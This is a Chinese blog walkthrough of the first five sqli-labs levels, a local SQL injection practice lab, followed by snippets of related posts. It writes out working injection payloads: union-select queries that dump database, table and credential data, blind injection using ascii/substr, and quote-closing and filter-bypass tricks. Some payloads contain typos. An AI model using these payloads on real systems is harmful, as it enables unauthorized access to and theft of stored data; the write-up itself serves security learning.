sqli-labs的前五题

已于 2024-01-28 08:38:06 修改
阅读量1.4k 收藏 32
点赞数 28
文章标签: 安全 web安全
于 2024-01-27 23:49:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JasonJiao66/article/details/135883957
版权

首先,我们需要搭建sqli-labs,在网上下载相关资源,并解压缩在小皮的WWW目录下,最先下载的是php5版本的资源,将小皮中的php版本换为5,无法创建数据库,又找到php7版本的资源,但是仍报错,最终在不断尝试下,又下载了MySQL5.1才顺利运行,

less1:

首先看到的是这句话:Please input the ID as parameter with numeric value

所以我打开hackbar先输入一个id=1进去(为了学习和操作方便,我直接在源代码中添加了echo $sql;使sql语句直接显示在welcome下方我们发现,网站正常返回了一个用户名与密码,继续输入不同的数字,同样的会返回不同的账号与密码。再之后我们尝试对其通过加分号,发现报错,

而我们继续使用一个二维语句,并用注释符--+放置结尾:   

 ?id =1' and 1=2--+

发送后语句后并没有返回报错,那我们的语句被正常执行,存在注入漏洞。

接下来,我们使用order by语句,order by的功能是对表中第n列数据进行排序,所以我们可以通过其报错来判断表中的列数,接下来从十开始,

我们发现报错,接下来使用二分法,令数字减半,最终试出有三个字段

接下来使用union selec联合查询来找到库名并观察返回值

 语句正常执行,但是与只输入1是一样的结果,所以我们继续将前方的1去掉,改为-1

事情发生了新的变化,在用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。将3的位置作为一个显示位,输入

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,schema_name from information_schema.schemata--+,对其进行查库操作,接着继续加入limit n,1来对库中不同行数据进行查询,如果数据过多查询太过繁琐,我们就可以使用group_concat()函数来连接到一行显示

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+

我们继续对security进行操作

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

单引号可能会引起一些问题,在有些时候需要改为十六进制,但是这里没有问题,就先继续使用了,此时,我们找到了用户名与密码的目录,第一关完成,此时也可以使用contact_ws('--',username,password)这个函数来一一对应取出账户与密码。

查看是否有注入

查看有多少列

查看哪些数据可回显

查库:select schema_name from information_schema.schemata

查表:select table_name from information_schema.tables where table_schema='security'

查列:select clumn_name from information_schema.columns where table_name='users'

查字段:select username,password from security.users

这是前几关的基本思路

less2:

第二关与第一关的差别不大,但是第二关并非第一关的字符串型,所以在?id=1后并不需要加单引号闭合,此外与第一关操作完全相同

less3:

在第三题中,我们输入一个1’报错中1被双引号与括号包裹,并且我们多一个单引号,所以在加上括号后,将结尾注释掉,我们发现恢复正常所以此题和第一题类似,但是需要多加一个括号,其余步骤与上相同

less4

同样的,我们再次输入1‘,发现能够正常返回,将’改为"后,出现报错观察报错我们多写一个双引号并在右侧出现括号,于是输入http://127.0.0.1/sqli-labs-master/Less-4/?id=1")--+正常返回,于是重复之前题目步骤,解决题目

less5

来到第五题后,我们传入一个1,与之前题目不同当我们更改其他数字时,其仅仅显示You are in 或不显示,当输入1’时,发生报错,说明存在注入漏洞,此题在传入正确内容时有回显,而传入错误内容时不显示,且显示内容不变化,所以,我们使用以下语句判断

http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20left((select%20database()),1)=%27A%27--+此时无回显数据,当我们将A不断更改时,会发现,当其等于S时,出现了返回数据所以,我们可以使用burp爆破,继续将第二位第三位试出,最后得到库名。

接下来我们换一种方法,

1./?id=1' and ascii(substr((select schema_name from information_schemata limit 1,1),1,1))>100--+

通过爆破红色位置,我们能得到其他库信息,使用相似方法,我们可以通过是否返回来猜测爆破数据是否正确,从而继续猜解其表信息,最终得到字段内的值。

JasonJiao66
关注
  • 28
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5665
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs部署及sqli-labs靶场
WE_zzs的博客
02-01 386
注:若在配置环境中无法启动mysql,应是和本地mysql冲突,需改端口号。1.下载phpstudy,并进入软件 打开nginx和mysql。并将其写入靶场配置文件中。(默认密码是root)4.选择sql-connerctions文件。5.在打开db-creds.inc文本。解压至phpstudy的www目录下。2.在启动和下载完成后将。输入127.0.0.1,
sqli-labs 五关
m0_64361111的博客
02-25 4372
less-1 输入?id=1 ,?id=1 and 1=1 ,?id=1 and 1=2 都显示正常 说明不是数字型注入 输入?id=1' 报错 输入 ?id=1' and '1'='1 显示正常,输入?id=1' and '1'='2 显示错误 说明存在字符型漏洞 输入?id=1' order by 1 --+ //判断字段 经过测试有三个字段 输入?id=-1' union select 1,2,3 --+ 判断回显位置 输入?id=-1' union select 1,2
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6534
1. 言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1208
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当操作系统-看是否支持大小写或文件路径选择-
sqli-labs第五关
qq_73722777的博客
03-02 596
于是我们尝试使用报错注入的方法对网页进行注入测试,这里我们使用dateupxml()语句进行报错注入。用以下语句进行名字-密码的分开输出,其中floor(rand(0)*2),count(*)为报错语句。此时的一个用户的用户名和密码获取完毕,继续获取第二个用户的数据。尝试对其进行联合搜索,但是输出结果不变,说明不能进行联合搜索。因此我们得知第五关应该为数字类型,于是尝试对其查询行数。此时可以发现数据输出不完全,需要分组对数据进行输出。得到结果超出行数,于是重新尝试3行。此时没有报错,说明行显数为3。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1600
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs26
qq_53030229的博客
06-01 920
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
sqli-labs 第五关
m0_63711447的博客
04-01 4511
第五关可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1308
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
AI安全系列——[第五空间 2022]AI(持续更新)
最新发布
2201_76139143的博客
07-15 724
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 375
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 569
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
sqli-labs第一题
09-03
sqli-labs的第一题是一个简单的SQL注入挑战,旨在让你熟悉基本的SQL注入技术。该题目要求你通过输入特定的注入语句来绕过应用程序的身份验证系统,以获得管理员权限。 具体步骤如下: 1. 打开sqli-labs网站并导航...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值